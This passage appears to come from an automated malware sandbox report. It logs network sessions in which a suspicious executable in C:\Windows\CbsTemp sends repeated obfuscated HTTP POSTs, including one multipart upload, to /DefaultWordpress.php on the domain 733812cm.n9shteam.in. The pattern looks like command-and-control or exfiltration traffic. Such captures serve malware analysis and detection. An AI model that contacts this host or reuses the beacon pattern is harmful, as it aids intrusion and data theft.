                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:59.214013100 CEST2528OUTData Raw: 5e 58 59 5b 5a 59 51 5d 54 5b 52 57 50 5b 57 56 50 50 5d 57 50 53 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^XY[ZYQ]T[RWP[WVPP]WPSWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]) =[2><7&8S<<]> 0,&![$"Z%>]):#F $P.
                                                          Oct 20, 2024 18:18:59.647763014 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:00.033348083 CEST792INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hg43ubRL42nUPMoa%2FTXYmwenE2vYEH6GKNvOizpJqr1jgxVFZPAxvntfHkgw4fnPqIkhJlVjo%2F5xZ7HXJLbkO186bGcVu7KcMFK5RLB7iyCPdy8JsdWg8FFL%2BUsYOIQHcmqRl6%2Fa%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53b24d51f9f9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12897&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=125259&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.550032188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:00.252286911 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:00.603921890 CEST2528OUTData Raw: 5b 5f 5c 5f 5f 5e 54 51 54 5b 52 57 50 53 57 57 50 51 5d 57 50 55 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [_\__^TQT[RWPSWWPQ]WPUWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>0>$;1R(38*?=()? $;X$1X$8>['.9+*#F $P.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.550033188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:01.753119946 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:02.104469061 CEST1948OUTData Raw: 5b 5a 59 59 5a 5c 51 5c 54 5b 52 57 50 58 57 56 50 51 5d 56 50 56 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZYYZ\Q\T[RWPXWVPQ]VPVW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ X*#[%].(;]3+1W(- [>?$3-%$$8*X39+*#F $P.,
                                                          Oct 20, 2024 18:19:02.562510014 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:02.930489063 CEST934INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7Qe1lPi187EagA5GBiwpAKDaW5XARlbeKfxbWiVytfeHV7vV6ZXpBDXnWLddsi7gYu8ZChXArNX%2BCQdiq0txIbid%2BJNNpIZ7ArSADr6uOoM2y8yOYsibWb7TAYlBagUZqTFGcdsLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c47e9e987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11170&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=129228&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 00 27 59 27 55 29 2f 2c 1f 2d 07 29 1d 2c 2d 3f 5e 2e 31 2a 04 27 0d 3a 14 27 2a 25 5d 31 23 27 5a 22 3c 21 03 20 11 07 56 39 26 28 5e 07 12 25 04 3c 2f 2c 59 2a 5b 33 00 28 06 06 59 36 37 38 1c 27 3d 30 0b 27 3d 3a 07 29 1f 3d 59 2a 2e 32 57 39 34 22 1b 3a 2b 38 58 20 2a 22 53 03 13 25 5d 3e 20 20 12 35 0b 37 11 3c 03 3f 58 2b 38 31 04 3e 33 27 12 29 3b 33 5f 38 2e 22 11 30 01 0e 58 25 2f 3f 00 32 2a 0d 1a 30 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%'Y'U)/,-),-?^.1*':'*%]1#'Z"<! V9&(^%</,Y*[3(Y678'=0'=:)=Y*.2W94":+8X *"S%]> 57<?X+81>3');3_8."0X%/?2*0$^-/W6[O0
                                                          Oct 20, 2024 18:19:03.147876024 CEST286OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:03.152664900 CEST934INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7Qe1lPi187EagA5GBiwpAKDaW5XARlbeKfxbWiVytfeHV7vV6ZXpBDXnWLddsi7gYu8ZChXArNX%2BCQdiq0txIbid%2BJNNpIZ7ArSADr6uOoM2y8yOYsibWb7TAYlBagUZqTFGcdsLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c47e9e987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11170&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=129228&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 00 27 59 27 55 29 2f 2c 1f 2d 07 29 1d 2c 2d 3f 5e 2e 31 2a 04 27 0d 3a 14 27 2a 25 5d 31 23 27 5a 22 3c 21 03 20 11 07 56 39 26 28 5e 07 12 25 04 3c 2f 2c 59 2a 5b 33 00 28 06 06 59 36 37 38 1c 27 3d 30 0b 27 3d 3a 07 29 1f 3d 59 2a 2e 32 57 39 34 22 1b 3a 2b 38 58 20 2a 22 53 03 13 25 5d 3e 20 20 12 35 0b 37 11 3c 03 3f 58 2b 38 31 04 3e 33 27 12 29 3b 33 5f 38 2e 22 11 30 01 0e 58 25 2f 3f 00 32 2a 0d 1a 30 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%'Y'U)/,-),-?^.1*':'*%]1#'Z"<! V9&(^%</,Y*[3(Y678'=0'=:)=Y*.2W94":+8X *"S%]> 57<?X+81>3');3_8."0X%/?2*0$^-/W6[O0
                                                          Oct 20, 2024 18:19:03.318171024 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:03.318344116 CEST540OUTData Raw: 5b 51 59 58 5f 59 51 55 54 5b 52 57 50 52 57 5c 50 50 5d 5e 50 50 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [QYX_YQUT[RWPRW\PP]^PPW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>3%Y19U?3;_$8!??>;'.,&4'+9$.&]?#F $P.
                                                          Oct 20, 2024 18:19:04.118716955 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NROgKoSlnwASvYi1Kdbz4CxWMHOWZAz7a9iMopnkNGM8ncOgByRR9%2FPfgbkWuXjvkTbVaRxjR5OEgihhKLpBCYq2CuI%2B9OepiSPcvu%2BICJz%2FMQ%2BEpZJtjiUrs1ykvyPQbqRwDkyIzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c93ad5987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11195&sent=7&recv=10&lost=0&retrans=0&sent_bytes=984&recv_bytes=3085&delivery_rate=256328&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:19:04.119462967 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----MPho9DAeco10vW2pgPLJfMXn3NFOjUpHuh
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2978
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:04.296036005 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:04.296330929 CEST2978OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 50 68 6f 39 44 41 65 63 6f 31 30 76 57 32 70 67 50 4c 4a 66 4d 58 6e 33 4e 46 4f 6a 55 70 48 75 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------MPho9DAeco10vW2pgPLJfMXn3NFOjUpHuhContent-Disposition: form-data; name="0"Content-Type: text/plain^X\S_YQPT[RWP\WVPX]YPUW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:19:04.688971043 CEST793INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=owCaHN%2BGmWUiqmSsO4eSMj1zCuVzZgdUizHPYKffOyXEKJRJC%2F%2Fs7a852YHgg9%2BFSZNx4D6l8B46agU9Etf1z2KTBaK2ehEh9QqcBxtnYL0wXqPv5r0yZ8Cc9DmBfxn9HaDwFbH0RA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53cf48bb987c-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11275&sent=12&recv=17&lost=0&retrans=0&sent_bytes=1802&recv_bytes=6385&delivery_rate=256328&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.550034188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:01.905075073 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:02.261285067 CEST2528OUTData Raw: 5b 51 5c 5f 5a 5d 51 51 54 5b 52 57 50 53 57 50 50 5e 5d 56 50 56 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\_Z]QQT[RWPSWPP^]VPVW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)-_2%+/[3(W<4Z)4Y';[&W?^02Y'X=(#F $P.
                                                          Oct 20, 2024 18:19:03.196873903 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:03.665529013 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzh57Nffn7WSthLPAOHcYrxV4w%2BmfokYOJGI87iJVLvYt6TQRwgc0LcjshVkbpaf0xr5yqKI6HitJmYPeHqY8SAG71Fs%2BOMulxEyMQjzdzr7fA%2B3V9WOIlLekDdvD74nouhRWj5BtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c87808cf31-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11451&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130110&cwnd=100&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:19:03.788907051 CEST788INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzh57Nffn7WSthLPAOHcYrxV4w%2BmfokYOJGI87iJVLvYt6TQRwgc0LcjshVkbpaf0xr5yqKI6HitJmYPeHqY8SAG71Fs%2BOMulxEyMQjzdzr7fA%2B3V9WOIlLekDdvD74nouhRWj5BtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53c87808cf31-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11451&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130110&cwnd=100&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.550035188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:03.808860064 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:04.166290998 CEST2528OUTData Raw: 5b 5a 5c 5f 5f 58 54 55 54 5b 52 57 50 58 57 51 50 59 5d 59 50 55 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\__XTUT[RWPXWQPY]YPUW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ])012+# $<=#),7'>;[%'%'>+#F $P.,
                                                          Oct 20, 2024 18:19:04.591478109 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:04.960334063 CEST796INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzeUIobkvIwUhgCtvf%2BHByvUhRtHg%2BdqfltiFcfcj8VpEzK0S7lCpZyZ3Xzk34XHINdwAW6vs%2Bpx8FYeDTJ%2BeYg5e%2Fx4mHaooLhDyf0eF%2FdsgkbowgPFvl1cgi%2F2z4aeQ44abVbeUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53d12fd7fa8e-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11853&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=121110&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.550036188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:05.395267963 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:05.744406939 CEST2528OUTData Raw: 5e 5d 5c 53 5a 5b 51 51 54 5b 52 57 50 5d 57 50 50 5a 5d 5b 50 56 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\SZ[QQT[RWP]WPPZ][PVW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=31(%R++$V?X$)/'0[<&!Y'8*\0.^(#F $P.
                                                          Oct 20, 2024 18:19:06.171859026 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:06.400712967 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:06 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NYfgkWk3jhD%2BhMj%2BCCq0XFHvS4runxe6HObNz123wREkbaNxWSmGoZ5oozFNATWpoLKDz%2B9JIogIFDl0E96O24TNvAsAA4%2BZMYEIuCZq5GMK14BsAaCo7KLl2XCyGYf%2FHm0rtkVkkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53db0c7d96cc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11146&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=129923&cwnd=47&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          58192.168.2.550037188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:06.753427029 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:07.103729010 CEST2528OUTData Raw: 5e 5d 5c 5c 5a 52 51 5c 54 5b 52 57 50 5d 57 51 50 5e 5d 59 50 5d 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\\ZRQ\T[RWP]WQP^]YP]WZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _)#Z%;-S(3#$6=.)<'?^113"0>"<#F $P.
                                                          Oct 20, 2024 18:19:07.567118883 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:07.803344011 CEST786INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eR%2FtlHMGtEXQDCTBZVGReiNQFnvYEi1gJDcW3RD0MeDUo7UNMwvH9zUR%2BxN8SfynB4Ua9tgMfoCk05DtYUtDaKveTFonmlHV0Bt0gWnTxE2Om0w5XIHfKYLF9QnYnp1Nz8ZhMQVgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a53e3cdacfb34-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13056&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=112676&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          59192.168.2.550038188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:19:07.949949980 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
